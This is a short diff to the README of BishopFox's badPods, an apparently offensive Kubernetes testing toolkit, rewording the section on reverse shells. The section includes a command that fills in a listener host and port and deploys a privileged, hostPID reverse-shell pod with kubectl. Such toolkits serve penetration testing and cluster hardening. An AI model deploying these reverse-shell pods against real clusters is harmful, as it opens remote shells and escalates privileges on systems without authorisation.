BishopFox/badPods/README.md

 ```

 ### Reverse Shells
-If you are in a position where you can create pods but not exec into them, you can use the reverse shell version of each pod.
+If you can create pods but not exec  into them, you can use the reverse shell version of each pod.
 To avoid having to edit each pod with your host and port, you can environment variables and the envsubst command.
 Remember to spin up all of your listeners first:

 ```bash
 HOST="10.0.0.1" PORT="3111" envsubst < ./yaml/priv-and-hostpid/pod-priv-and-hostpid-revshell.yaml | kubectl apply -f -